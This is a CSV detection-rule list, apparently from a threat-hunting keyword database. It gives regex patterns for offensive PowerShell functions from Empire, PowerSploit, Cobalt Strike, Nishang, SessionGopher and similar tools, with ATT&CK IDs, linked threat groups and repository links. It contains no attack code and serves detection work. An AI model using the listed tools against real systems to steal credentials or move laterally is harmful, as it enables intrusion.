"*Invoke-ServiceDisable*",".{0,1000}Invoke\-ServiceDisable.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49528"
"*Invoke-Service-persistence.ps1*",".{0,1000}Invoke\-Service\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","49529"
"*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49530"
"*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49531"
"*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49532"
"*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49533"
"*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49534"
"*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49535"
"*Invoke-ServiceStart*",".{0,1000}Invoke\-ServiceStart.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49536"
"*Invoke-ServiceStop*",".{0,1000}Invoke\-ServiceStop.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49537"
"*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49538"
"*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49539"
"*Invoke-ServiceUserAdd*",".{0,1000}Invoke\-ServiceUserAdd.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49540"
"*Invoke-SessionExec *",".{0,1000}Invoke\-SessionExec\s.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","49541"
"*Invoke-SessionExec.ps1*",".{0,1000}Invoke\-SessionExec\.ps1.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","1","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","49542"
"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49543"
"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49544"
"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49545"
"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49546"
"*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","49547"
"*Invoke-SessionGopher.ps1*",".{0,1000}Invoke\-SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49548"
"*Invoke-SessionHunter *",".{0,1000}Invoke\-SessionHunter\s.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49549"
"*Invoke-SessionHunter*",".{0,1000}Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49550"
"*Invoke-SessionHunter.ps1*",".{0,1000}Invoke\-SessionHunter\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49551"
"*Invoke-SessionHunter.ps1*",".{0,1000}Invoke\-SessionHunter\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49552"
"*Invoke-ShadowSpray*",".{0,1000}Invoke\-ShadowSpray.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49553"
"*invoke-sharefinder *",".{0,1000}invoke\-sharefinder\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49554"
"*Invoke-ShareFinder -CheckShareAccess*",".{0,1000}Invoke\-ShareFinder\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","49555"
"*invokesharefinder*",".{0,1000}invokesharefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49556"
"*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49557"
"*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49558"
"*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49559"
"*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49560"
"*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49561"
"*Invoke-ShareHunter *",".{0,1000}Invoke\-ShareHunter\s.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","49562"
